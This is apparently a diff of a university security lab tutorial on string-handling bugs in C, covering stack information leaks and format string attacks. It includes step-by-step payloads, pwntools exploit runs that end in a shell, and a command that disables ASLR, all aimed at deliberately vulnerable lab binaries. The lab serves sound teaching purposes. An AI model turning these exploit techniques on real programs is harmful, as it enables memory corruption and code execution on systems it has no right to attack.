"cns:labs:lab-05"), on most platforms, we will start accessing the content of the stack. -After the `buf` variable the stack stores the `old rbp`, the function return address and then the function parameters. -This information is copied into `my_string`. -As such, printing information in `my_string` (after byte index `32`) using `puts()` results in information leaks. - -We can test this using: - -```console -$ python -c 'print("A"*32)' | ./basic_info_leak -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�8� -``` - -In order to check the hexadecimal values of the leak, we pipe the output -through `xxd`: - -```console -$ python -c 'print("A"*32)' | ./basic_info_leak | xxd -00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA -00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA -00000020: d066 57b4 fc7f 0a .fW.... -``` - -We have leaked one value above: - -- the lower non-0 bytes of the old/stored `rbp` value (right after the buffer) -- `0x7ffcb45766d0` (it's a little endian architecture); - it will differ on your system - -The return address usually doesn't change (except for executables with PIE, *Position Independent Executable* support). -But assuming ASLR is enabled, the `rbp` value changes at each run. -If we leak it we have a basic address that we can toy around to leak or overwrite other values. - -### 2. Information Leak - -We will now show how improper string handling will lead to information leaks from the memory. -For this, please access the `02-info-leak/` subfolder. -Please browse the `info-leak.c` source code file. - -The snippet below is the relevant code snippet. -The goal is to call the `my_evil_func()` function. -One of the building blocks of exploiting a vulnerability is to see whether or not we have memory write. -If you have memory writes, then getting code execution is a matter of getting things right. -In this task we are assuming that we have memory write (i.e. we can write any value at any address). -You can call the `my_evil_func()` function by overriding the return address of the `my_main()` function: - -```c -#define NAME_SZ 32 -  -static void read_name(char *name) -{ - memset(name, 0, NAME_SZ); - read(0, name, NAME_SZ); - //name[NAME_SZ-1] = 0; -} -  -static void my_main(void) -{ - char name[NAME_SZ]; -  - read_name(name); - printf("hello %s, what address to modify and with what value?\n", name); - fflush(stdout); - my_memory_write(); - printf("Returning from main!\n"); -} -``` - -What catches our eye is that the `read()` function call in the `read_name()` function read **exactly** `32` bytes. -If we provide it `32` bytes it won't be null-terminated and will result in an information leak when `printf()` is called in the `my_main()` function. - -#### Exploiting the Memory Write Using the Info Leak - -Let's first try to see how the program works: - -```console -$ python -c 'import sys; sys.stdout.write(10*"A")' | ./info_leak -hello AAAAAAAAAA, what address to modify and with what value? -``` - -The binary wants an input from the user using the `read()` library call as we can see below: - -```console -$ python -c 'import sys; sys.stdout.write(10*"A")' | strace -e read ./info_leak -read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\203\1\0004\0\0\0"..., 512) = 512 -read(0, "AAAAAAAAAA", 32) = 10 -hello AAAAAAAAAA, what address to modify and with what value? -read(0, "", 4) = 0 -+++ exited with 255 +++ -``` - -The input is read using the `read()` system call. -The first read expects 32 bytes. -You can see already that there's another `read()` call. -That one is the first `read()` call in the `my_memory_write()` function. - -As noted above, if we use exactly `32` bytes for name we will end up with a non-null-terminated string, leading to an information leak. -Let's see how that goes: - -```console -$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak -hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�)���, what address to modify and with what value? -  -$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd -00000000: 6865 6c6c 6f20 4141 4141 4141 4141 4141 hello AAAAAAAAAA -00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA -00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh -00000030: 6174 2061 6464 7265 7373 2074 6f20 6d6f at address to mo -00000040: 6469 6679 2061 6e64 2077 6974 6820 7768 dify and with wh -00000050: 6174 2076 616c 7565 3f0a at value?. -``` - -We see we have an information leak. -We leak one piece of data above: `0x7fffffffdcf0`. -If we run multiple times we can see that the values for the first piece of information differs: - -```console -$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd | grep ',' -00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh -``` - -The variable part is related to a stack address (it starts with `0x7f`); it varies because ASLR is enabled. -We want to look more carefully using GDB and figure out what the variable value represents: - -```console -$ gdb -q ./info_leak -Reading symbols from ./info_leak...done. -gdb-peda$ b my_main -Breakpoint 1 at 0x400560 -gdb-peda$ r < <(python -c 'import sys; sys.stdout.write(32*"A")') -Starting program: info_leak < <(python -c 'import sys; sys.stdout.write(32*"A")') -[...] -  -# Do next instructions until after the call to printf. -gdb-peda$ ni -.... -  -gdb-peda$ x/12g name -0x7fffffffdc20: 0x4141414141414141 0x4141414141414141 -0x7fffffffdc30: 0x4141414141414141 0x4141414141414141 -0x7fffffffdc40: 0x00007fffffffdc50 0x00000000004007aa -gdb-peda$ x/2i 0x004007aa - 0x4007aa : mov edi,0x4008bc - 0x4007af : call 0x400550 -gdb-peda$ pdis main -Dump of assembler code for function main: - 0x00000000004007a1 <+0>: push rbp - 0x00000000004007a2 <+1>: mov rbp,rsp - 0x00000000004007a5 <+4>: call 0x400756 - 0x00000000004007aa <+9>: mov edi,0x4008bc - 0x00000000004007af <+14>: call 0x400550 - 0x00000000004007b4 <+19>: mov eax,0x0 - 0x00000000004007b9 <+24>: pop rbp - 0x00000000004007ba <+25>: ret -End of assembler dump. -gdb-peda$ -``` - -From the GDB above, we determine that, after our buffer, there is the stored `rbp` (i.e. old rbp). - -In 32-bit program there would (usually) be 2 leaked values: - -1. The old `ebp` -1. The return address of the function - -This happens if the values of the old `ebp` and the return address don't have any `x00` bytes. - -In the 64-bit example we only get the old `rbp` because the 2 high bytes of the stack address are always `0` which causes the string to be terminated early. - -When we leak the two values we are able to retrieve the stored `rbp` value. -In the above run the value of `rbp` is `0x00007fffffffdc50`. -We also see that the stored `rbp` value is stored at **address** `0x7fffffffdc40`, which is the address current `rbp`. -We have the situation in the below diagram: - -![](https://ocw.cs.pub.ro/courses/_media/cns/labs/info-leak-stack-64.png) - -We marked the stored `rbp` value (i.e. the frame pointer for `main()`: `0x7fffffffdc50`) with the font color red in both places. - -In short, if we leak the value of the stored `rbp` (i.e. the frame pointer for `main()`: `0x00007fffffffdc50`) we can determine the address of the current `rbp` (i.e. the frame pointer for `my_main()`: `0x7fffffffdc40`), by subtracting `16`. -The address where the `my_main()` return address is stored (`0x7fffffffdc48`) is computed by subtracting `8` from the leaked `rbp` value. -By overwriting the value at this address we will force an arbitrary code execution and call `my_evil_func()`. - -In order to write the return address of the `my_main()` function with the address of the `my_evil_func()` function, make use of the conveniently (but not realistically) placed `my_memory_write()` function. -The `my_memory_write()` allows the user to write arbitrary values to arbitrary memory addresses. - -Considering all of this, update the `TODO` lines of the `exploit.py` script to make it call the `my_evil_func()` function. - -Same as above, use `nm` to determine address of the `my_evil_func()` function. -When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. -The precompiled binary can be found in [the CNS public repository](/courses/cns/resources/repo "cns:resources:repo"). - -Use the above logic to determine the `old rbp` leak and then the address of the `my_main()` return address. - -See [here](https://docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.unpack "https://docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.unpack") examples of using the `unpack()` function. - -In case of a successful exploit the program will spawn a shell in the `my_evil_func()` function, same as below: - -```console -$ python exploit.py -[!] Could not find executable 'info_leak' in $PATH, using './info_leak' instead -[+] Starting local process './info_leak': pid 6422 -[*] old_rbp is 0x7fffffffdd40 -[*] return address is located at is 0x7fffffffdd38 -[*] Switching to interactive mode -Returning from main! -$ id -uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) -``` - -The rule of thumb is: **Always know your string length.** - -#### Format String Attacks - -We will now see how (im)proper use of `printf` may provide us with ways of extracting information or doing actual attacks. - -Calling `printf` or some other string function that takes a format string as a parameter, directly with a string which is supplied by the user leads to a vulnerability called **format string attack**. - -The definition of `printf`: - -```c -int printf(const char *format, ...); -``` - -Let's recap some of [useful formats](http://www.cplusplus.com/reference/cstdio/printf/ "http://www.cplusplus.com/reference/cstdio/printf/"): - -- `%08x` -- prints a number in hex format, meaning takes a number from the stack and prints in hex format -- `%s` -- prints a string, meaning takes a pointer from the stack and prints the string from that address -- `%n` -- writes the number of bytes written so far to the address given as a parameter to the function (takes a pointer from the stack). -This format is not widely used but it is in the C standard. -- `%x` and `%n` are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls printf (or other format string function) directly with a string controlled by the user. - -### Example 2 - -```c -printf(my_string); -``` - -The above snippet is a good example of why ignoring compile time warnings is dangerous. -The given example is easily detected by a static checker. - -Try to think about: - -- The peculiarities of `printf` (variable number of arguments) -- Where `printf` stores its arguments (*hint*: on the stack) -- What happens when `my_string` is `"%x"` -- How matching between format strings (e.g. the one above) and arguments is enforced (*hint*: it's not) and what happens in general when the number of arguments doesn't match the number of format specifiers -- How we could use this to cause information leaks and arbitrary memory writes (*hint*: see the format specifiers at the beginning of the section) - -### Example 3 - -We would like to check some of the well known and not so-well known features of [the printf function](http://man7.org/linux/man-pages/man3/printf.3.html "http://man7.org/linux/man-pages/man3/printf.3.html"). -Some of them may be used for information leaking and for attacks such as format string attacks. - -Go into `printf-features/` subfolder and browse the `printf-features.c` file. -Compile the executable file using: - -```console -make -``` - -and then run the resulting executable file using - -```console -./printf-features -``` - -Go through the `printf-features.c` file again and check how print, length and conversion specifiers are used by `printf`. -We will make use of the `%n` feature that allows memory writes, a requirement for attacks. - -### Basic Format String Attack - -You will now do a basic format string attack using the `03-basic-format-string/` subfolder. -The source code is in `basic_format_string.c` and the executable is in `basic_format_string`. - -You need to use `%n` to overwrite the value of the `v` variable to `0x300`. -You have to do three steps: - -1. Determine the address of the `v` variable using `nm`. - -1. Determine the `n`-th parameter of `printf()` that you can write to using `%n`. -The `buffer` variable will have to be that parameter; you will store the address of the `v` variable in the `buffer` variable. - -1. Construct a format string that enables the attack; the number of characters processed by `printf()` until `%n` is matched will have to be `0x300`. - - -For the second step let's run the program multiple times and figure out where the `buffer` address starts. -We fill `buffer` with the `aaaa` string and we expect to discover it using the `printf()` format specifiers. - -```console -$ ./basic_format_string -AAAAAAAA -%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx -7fffffffdcc07fffffffdcc01f6022897ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25 - -$ ./basic_format_string -AAAAAAAA -%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx -x7fffffffdcc07fffffffdcc0116022917ffff7dd18d06c6c25786c6c25786c6c25786c6c25786c6c25786c6c25787fffffffdcc07fffffffdcc01f6022917ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a - -$ ./basic_format_string -AAAAAAAA -%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx -7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a4141414141414141 -``` - -In the last run we get the `4141414141414141` representation of `AAAAAAAA`. -That means that, if we replace the final `%lx` with `%n`, we will write at the address `0x4141414141414141` the number of characters processed so far: - -```console -$ echo -n '7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a' | wc -c -162 -``` - -We need that number to be `0x300`. -You can fine tune the format string by using a construct such as `%32llx` to print a number on `32` characters instead of a maximum of `16` characters. -See how much extra room you need and see if you reach `0x300` bytes. - -The construct needn't use a multiple of `8` for length. -You may use the `%32llx` or `%33llx` or `%42llx`. -The numeric argument states the length of the print output. - -After the plan is complete, write down the attack by filling the `TODO` lines in the `exploit.py` solution skeleton. - -When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. -The precompiled binary can be found in [the CNS public repository](/courses/cns/resources/repo "cns:resources:repo"). - -After you write 0x300 chars in v, you should obtain shell - -```console -$ python exploit64.py -[!] Could not find executable 'basic_format_string' in $PATH, using './basic_format_string' instead -[+] Starting local process './basic_format_string': pid 20785 -[*] Switching to interactive mode - 7fffffffdcc0 7fffffffdcc01f60229b7ffff7dd18d03125786c6c393425786c6c25786c6c34786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25a6e25 -$ -``` - -### Extra: Format String Attack - -Go to the `04-format-string/` subfolder. -In this task you will be working with a **32-bit binary**. - -The goal of this task is to call `my_evil_func` again. -This task is also tutorial based. - -```c -int main(int argc, char *argv[]) -{ - printf(argv[1]); - printf("\nThis is the most useless and insecure program!\n"); - return 0; -} -``` - -#### Transform Format String Attack to a Memory Write - -Any string that represents a useful format (e.g. `%d`, `%x` etc.) can be used to discover the vulnerability. - -```console -$ ./format "%08x %08x %08x %08x" -00000000 f759d4d3 00000002 ffd59bd4 -This is the most useless and insecure program! -``` - -The values starting with 0xf are very likely pointers. -Again, we can use this vulnerability as a information leakage. -But we want more. - -Another useful format for us is `%m$` followed by any normal format selector. -Which means that the `m`th parameter is used as an input for the following format. `%10$08x` will print the `10`th paramater with `%08x`. -This allows us to do a precise access of the stack. - -Example: - -```console -$ ./format "%08x %08x %08x %08x %1\$08x %2\$08x %3\$08x %4\$08x" -00000000 f760d4d3 00000002 ff9aca24 00000000 f760d4d3 00000002 ff9aca24 -This is the most useless and insecure program! -``` - -Note the equivalence between formats. -Now, because we are able to select *any* higher address with this function and because the buffer is on the stack, sooner or later we will discover our own buffer. - -```console -$ ./format "$(python -c 'print("%08x\n" * 10000)')" -``` - -Depending on your setup you should be able to view the hex -representation of the string "%08x\\n". - -**Why do we need our own buffer?** -Remember the `%n` format? -It can be used to write at an address given as parameter. -The idea is to give this address as parameter and achieve memory writing. -We will see later how to control the value. - -The next steps are done with ASLR disabled. -In order to disable ASLR, please run: - -```console -echo 0 | sudo tee /proc/sys/kernel/randomize_va_space -``` - -By trial and error or by using GDB (breakpoint on `printf`) we can determine where the buffer starts: - -```console -$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"%08x\n " * 0x300)')" | grep -n 41 | head -10: ffffc410 -52: ffffcc41 -72: ffffcf41 -175: 44434241 -``` - -Command line Python exploits tend to get very tedious and hard to read when the payload gets more complex. -You can use the following reference pwntools script to write your exploit. -The code is equivalent to the above one-liner. - -```python -#!/usr/bin/env python3 -  -from pwn import * -  -stack_items = 200 -  -pad = b"ABCD" -val_fmt = b"%08x\n " -# add a \n at the end for consistency with the command line run -fmt = pad + val_fmt * stack_items + b"\n" -  -io = process(["./format", fmt]) -  -io.interactive() -``` - -Then call the `format` using: - -```console -$ python exploit.py -``` - -One idea is to keep things in multiple of 4, like "%08x \\n". -If you are looking at line `175` we have `44434241` which is the base 16 representation of `“ABCD”` (because it's little endian). -Note, you can add as many format strings you want, the start of the buffer will be the same (more or less). - -We can compress our buffer by specifying the position of the argument. - -```console -$ ./format $(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"AAAAAAAA" * 199 + b"%175$08x")') -ABCDAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAA44434241 -This is the most useless and insecure program! -``` - -`b"AAAAAAAA" * 199` is added to maintain the length of the original string, otherwise the offset might change. - -You can see that the last information is our b"ABCD" string printed with `%08x` this means that we know where our buffer is. - -You need to enable core dumps in order to reproduce the steps below: - -```console -$ ulimit -c unlimited -``` - -The steps below work an a given version of libc and a given system. -It's why the instruction that causes the fault is - -```asm -mov %edx,(%eax) -``` - -or the equivalent in Intel syntax - -```asm -mov DWORD PTR [eax], edx -``` - -It may be different on your system, for example `edx` may be replaced by `esi`, cuch as - -```asm -mov DWORD PTR [eax], esi -``` - -Update the explanations below accordingly. - -Remove any core files you may have generated before testing yourprogram: - -```console -rm -f core -``` - -We can replace `%08x` with `%n` this should lead to segmentation fault. - -```console -$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"AAAAAAAA" * 199 + b"%175$08n")')" -Segmentation fault (core dumped) - -$ gdb ./format -c core -... -Core was generated by `./format BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. -Program terminated with signal 11, Segmentation fault. -#0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6 -(gdb) bt -#0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6 -#1 0xf7e5deff in printf () from /lib/i386-linux-gnu/libc.so.6 -#2 0x08048468 in main (argc=2, argv=0xffffd2f4) at format.c:18 -(gdb) x/i $eip -=> 0xf7e580a2 : mov %edx,(%eax) -(gdb) info registers $edx $eax -edx 0x202 1596 -eax 0x44434241 1145258561 -(gdb) quit -``` - -Bingo. -We have memory write. -The vulnerable code tried to write at the address `0x44434241` ("ABCD" little endian) the value 1596. -The value 1596 is the amount of data wrote so far by `printf`(`“ABCD” + 199 * “AAAAAAAA”`). - -Right now, our input string has 1605 bytes (1604 with a `n` at the end). -But we can further compress it, thus making the value that we write independent of the length of the input. - -```console -$ ./format "$(python -c 'import sys; sys.stdout.buffer.write("ABCD" + "A" * 1588 + "%99x" + "%126$08n")')" -Segmentation fault (core dumped) - -$ gdb ./format -c core -(gdb) info registers $edx $eax -edx 0x261 1691 -eax 0x44434241 1145258561 -(gdb) quit -``` - -Here we managed to write `1691` (`4+1588+99`). -Note we should keep the number of bytes before the format string the same. -Which means that if we want to print with a padding of 100 (three digits) we should remove one `A`. -You can try this by yourself. - -**How far can we go?** -Probably we can use any integer for specifying the number of bytes which are used for a format, but we don't need this; moreover specifying a very large padding is not always feasible, think what happens when printing with `snprintf`. 255 should be enough. - -Remember, we want to write a value to a certain address. -So far we control the address, but the value is somewhat limited. -If we want to write 4 bytes at a time we can make use of the endianess of the machine. **The idea** is to write at the address n and then at the address n+1 and so on. - -Lets first display the address. -We are using the address `0x804c014`. -This address is the address of the got entry for the puts function. -Basically, we will override the got entry for the puts. - -Check the `exploit.py` script from the task directory, read the commends and understand what it does. - -```console -$ python exploit.py -[*] 'format' - Arch: i386-32-little - RELRO: Partial RELRO - Stack: No canary found - NX: NX enabled - PIE: No PIE (0x8048000) -[+] Starting local process './format': pid 29030 -[*] Switching to interactive mode -[*] Process './format' stopped with exit code 0 (pid 29030) -\x14\x04\x15\x04\x17\x04\x18\x04 804c014 804c015 804c017 804c018 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... -This is the most useless and insecure program! -``` - -The output starts with `\x14\x04\x15\x04\x17\x04\x18\x04 804c014 804c015 804c017 804c018` which is the 4 addresses we have written (raw, little endian) followed by the numerical prints done with `%x` of the same addresses. - -If you have the same output it means that now, if you replace `%x` with `%n` (change `fmt = write_fmt` in the script) it will try to write something at those valid addresses. - -We want to put the value `0x080491a6`. - -```console -$ objdump -d ./format | grep my_evil -080491a6 : -``` - -As `%n` writes how many characters have been printed until it is reached, each `%n` will print an incrementally larger value. -We use the 4 adjacent adressess to write byte by byte and use overflows to reach a lower value for the next byte. -For example, after writing `0xa6` we can write `0x0191`: - -![](https://ocw.cs.pub.ro/courses/_media/cns/labs/bytes_write.png) - -Also, the `%n` count doesn\'t reset so, if we want to write `0xa6` and then `0x91` the payload should be in the form of `<0xa6 bytes>%n<0x100 - 0xa6 + 0x91 bytes>%n`. - -As mentioned earlier above, instead writing N bytes `“A” * N` you can use other format strings like `%Nc` or `%Nx` to keep the payload shorter. - -**Bonus task** Can you get a shell? -(Assume ASLR is disabled). - -#### Mitigation and Recommendations - -1. Manage the string length carefully -1. Don't use `gets`. - With `gets` there is no way of knowing how much data was read -1. Use string functions with `n` parameter, whenever a non constant string is involved. i.e. `strnprintf`, `strncat`. -1. Make sure that the `NUL` byte is added, for instance `strncpy` does **not** add a `NUL` byte. -1. Use `wcstr*` functions when dealing with wide char strings. -1. Don't trust the user! - -#### Real life Examples - -- [Heartbleed](http://xkcd.com/1354/) - Linux kernel through 3.9.4 [CVE-2013-2851](http://www.cvedetails.com/cve/CVE-2013-2851/) - The fix is [here](http://marc.info/?l=linux-kernel&m=137055204522556&w=2). - More details [here](http://www.intelligentexploit.com/view-details-ascii.html?id=16609). - -- Windows 7 [CVE-2012-1851](http://www.cvedetails.com/cve/CVE-2012-1851/) - -- Pidgin off the record plugin [CVE-2012-2369](http://www.cvedetails.com/cve/CVE-2012-2369). - The fix is [here](https://bugzilla.novell.com/show_bug.cgi?id=762498#c1) - -### Resources - -- [Secure Coding in C and C++](http://www.cert.org/books/secure-coding/) -- [String representation in C](http://www.informit.com/articles/article.aspx?p=2036582) -- [Improper string length checking](https://www.owasp.org/index.php/Improper_string_length_checking) -- [Format String definition](http://cwe.mitre.org/data/definitions/134.html) -- [Format String Attack (OWASP)](https://www.owasp.org/index.php/Format_string_attack) -- [Format String Attack (webappsec)](http://projects.webappsec.org/w/page/13246926/Format%20String) -- [strlcpy and strlcat - consistent, safe, string copy and concatenation.](http://www.gratisoft.us/todd/papers/strlcpy.html): This resource is useful to understand some of the string manipulation problems. +# Information Leaks + +## Introduction + +#### Objectives & Rationale + +This is a tutorial based lab. +Throughout this lab you will learn about frequent errors that occur when handling strings. +This tutorial is focused on the C language. +Generally, OOP languages (like Java, C#,C++) are using classes to represent strings -- this simplifies the way strings are handled and decreases the frequency of programming errors. + +#### What is a String? + +Conceptually, a string is sequence of characters. +The representation of a string can be done in multiple ways. +One of the way is to represent a string as a contiguous memory buffer. +Each character is **encoded** in a way. +For example the **ASCII** encoding uses 7-bit integers to encode each character -- because it is more convenient to store 8-bits at a time in a byte, an ASCII character is stored in one byte. + +The type for representing an ASCII character in C is `char` and it uses one byte. +As a side note, `sizeof(char) == 1` is the only guarantee that the [C standard](http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf "http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf") gives. + +Another encoding that can be used is Unicode (with UTF8, UTF16, UTF32 etc. as mappings). +The idea is that in order to represent an Unicode string, **more than one** byte is needed for **one** character. +`char16_t`, `char32_t` were introduced in the C standard to represent these strings. +The C language also has another type, called `wchar_t`, which is implementation defined and should not be used to represent Unicode characters. + +Our tutorial will focus on ASCII strings, where each character is represented in one byte. +We will show a few examples of what happens when one calls *string manipulation functions* that are assuming a specific encoding of the string. + +You will find extensive information on ASCII in the [ascii man page](http://man7.org/linux/man-pages/man7/ascii.7.html "http://man7.org/linux/man-pages/man7/ascii.7.html"). + +Inside an Unix terminal issue the command + +```console +man ascii +``` + +### Length Management + +In C, the length of an ASCII string is given by its contents. +An ASCII string ends with a `0` value byte called the `NUL` byte. +Every `str*` function (i.e. a function with the name starting with `str`, such as `strcpy`, `strcat`, `strdup`, `strstr` etc.) uses this `0` byte to detect where the string ends. +As a result, not ending strings in `0` and using `str*` functions leads to vulnerabilities. + +### 1. Basic Info Leak (tutorial) + + +Enter the `01-basic-info-leak/` subfolder. +It's a basic information leak example. + +In `basic_info_leak.c`, `buf` is supplied as input, hence is not trusted. +We should be careful with this buffer. +If the user gives `32` bytes as input then `strcpy` will copy bytes in `my_string` until it finds a `NUL` byte (`0x00`). +Because the [stack grows down](/courses/cns/labs/lab-05 "cns:labs:lab-05"), on most platforms, we will start accessing the content of the stack. +After the `buf` variable the stack stores the `old rbp`, the function return address and then the function parameters. +This information is copied into `my_string`. +As such, printing information in `my_string` (after byte index `32`) using `puts()` results in information leaks. + +We can test this using: + +```console +$ python -c 'print("A"*32)' | ./basic_info_leak +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�8� +``` + +In order to check the hexadecimal values of the leak, we pipe the output +through `xxd`: + +```console +$ python -c 'print("A"*32)' | ./basic_info_leak | xxd +00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA +00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA +00000020: d066 57b4 fc7f 0a .fW.... +``` + +We have leaked one value above: + +- the lower non-0 bytes of the old/stored `rbp` value (right after the buffer) +- `0x7ffcb45766d0` (it's a little endian architecture); + it will differ on your system + +The return address usually doesn't change (except for executables with PIE, *Position Independent Executable* support). +But assuming ASLR is enabled, the `rbp` value changes at each run. +If we leak it we have a basic address that we can toy around to leak or overwrite other values. + +### 2. Information Leak + +We will now show how improper string handling will lead to information leaks from the memory. +For this, please access the `02-info-leak/` subfolder. +Please browse the `info-leak.c` source code file. + +The snippet below is the relevant code snippet. +The goal is to call the `my_evil_func()` function. +One of the building blocks of exploiting a vulnerability is to see whether or not we have memory write. +If you have memory writes, then getting code execution is a matter of getting things right. +In this task we are assuming that we have memory write (i.e. we can write any value at any address). +You can call the `my_evil_func()` function by overriding the return address of the `my_main()` function: + +```c +#define NAME_SZ 32 +  +static void read_name(char *name) +{ + memset(name, 0, NAME_SZ); + read(0, name, NAME_SZ); + //name[NAME_SZ-1] = 0; +} +  +static void my_main(void) +{ + char name[NAME_SZ]; +  + read_name(name); + printf("hello %s, what address to modify and with what value?\n", name); + fflush(stdout); + my_memory_write(); + printf("Returning from main!\n"); +} +``` + +What catches our eye is that the `read()` function call in the `read_name()` function read **exactly** `32` bytes. +If we provide it `32` bytes it won't be null-terminated and will result in an information leak when `printf()` is called in the `my_main()` function. + +#### Exploiting the Memory Write Using the Info Leak + +Let's first try to see how the program works: + +```console +$ python -c 'import sys; sys.stdout.write(10*"A")' | ./info_leak +hello AAAAAAAAAA, what address to modify and with what value? +``` + +The binary wants an input from the user using the `read()` library call as we can see below: + +```console +$ python -c 'import sys; sys.stdout.write(10*"A")' | strace -e read ./info_leak +read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\203\1\0004\0\0\0"..., 512) = 512 +read(0, "AAAAAAAAAA", 32) = 10 +hello AAAAAAAAAA, what address to modify and with what value? +read(0, "", 4) = 0 ++++ exited with 255 +++ +``` + +The input is read using the `read()` system call. +The first read expects 32 bytes. +You can see already that there's another `read()` call. +That one is the first `read()` call in the `my_memory_write()` function. + +As noted above, if we use exactly `32` bytes for name we will end up with a non-null-terminated string, leading to an information leak. +Let's see how that goes: + +```console +$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak +hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�)���, what address to modify and with what value? +  +$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd +00000000: 6865 6c6c 6f20 4141 4141 4141 4141 4141 hello AAAAAAAAAA +00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA +00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh +00000030: 6174 2061 6464 7265 7373 2074 6f20 6d6f at address to mo +00000040: 6469 6679 2061 6e64 2077 6974 6820 7768 dify and with wh +00000050: 6174 2076 616c 7565 3f0a at value?. +``` + +We see we have an information leak. +We leak one piece of data above: `0x7fffffffdcf0`. +If we run multiple times we can see that the values for the first piece of information differs: + +```console +$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd | grep ',' +00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh +``` + +The variable part is related to a stack address (it starts with `0x7f`); it varies because ASLR is enabled. +We want to look more carefully using GDB and figure out what the variable value represents: + +```console +$ gdb -q ./info_leak +Reading symbols from ./info_leak...done. +gdb-peda$ b my_main +Breakpoint 1 at 0x400560 +gdb-peda$ r < <(python -c 'import sys; sys.stdout.write(32*"A")') +Starting program: info_leak < <(python -c 'import sys; sys.stdout.write(32*"A")') +[...] +  +# Do next instructions until after the call to printf. +gdb-peda$ ni +.... +  +gdb-peda$ x/12g name +0x7fffffffdc20: 0x4141414141414141 0x4141414141414141 +0x7fffffffdc30: 0x4141414141414141 0x4141414141414141 +0x7fffffffdc40: 0x00007fffffffdc50 0x00000000004007aa +gdb-peda$ x/2i 0x004007aa + 0x4007aa : mov edi,0x4008bc + 0x4007af : call 0x400550 +gdb-peda$ pdis main +Dump of assembler code for function main: + 0x00000000004007a1 <+0>: push rbp + 0x00000000004007a2 <+1>: mov rbp,rsp + 0x00000000004007a5 <+4>: call 0x400756 + 0x00000000004007aa <+9>: mov edi,0x4008bc + 0x00000000004007af <+14>: call 0x400550 + 0x00000000004007b4 <+19>: mov eax,0x0 + 0x00000000004007b9 <+24>: pop rbp + 0x00000000004007ba <+25>: ret +End of assembler dump. +gdb-peda$ +``` + +From the GDB above, we determine that, after our buffer, there is the stored `rbp` (i.e. old rbp). + +In 32-bit program there would (usually) be 2 leaked values: + +1. The old `ebp` +1. The return address of the function + +This happens if the values of the old `ebp` and the return address don't have any `x00` bytes. + +In the 64-bit example we only get the old `rbp` because the 2 high bytes of the stack address are always `0` which causes the string to be terminated early. + +When we leak the two values we are able to retrieve the stored `rbp` value. +In the above run the value of `rbp` is `0x00007fffffffdc50`. +We also see that the stored `rbp` value is stored at **address** `0x7fffffffdc40`, which is the address current `rbp`. +We have the situation in the below diagram: + +![](https://ocw.cs.pub.ro/courses/_media/cns/labs/info-leak-stack-64.png) + +We marked the stored `rbp` value (i.e. the frame pointer for `main()`: `0x7fffffffdc50`) with the font color red in both places. + +In short, if we leak the value of the stored `rbp` (i.e. the frame pointer for `main()`: `0x00007fffffffdc50`) we can determine the address of the current `rbp` (i.e. the frame pointer for `my_main()`: `0x7fffffffdc40`), by subtracting `16`. +The address where the `my_main()` return address is stored (`0x7fffffffdc48`) is computed by subtracting `8` from the leaked `rbp` value. +By overwriting the value at this address we will force an arbitrary code execution and call `my_evil_func()`. + +In order to write the return address of the `my_main()` function with the address of the `my_evil_func()` function, make use of the conveniently (but not realistically) 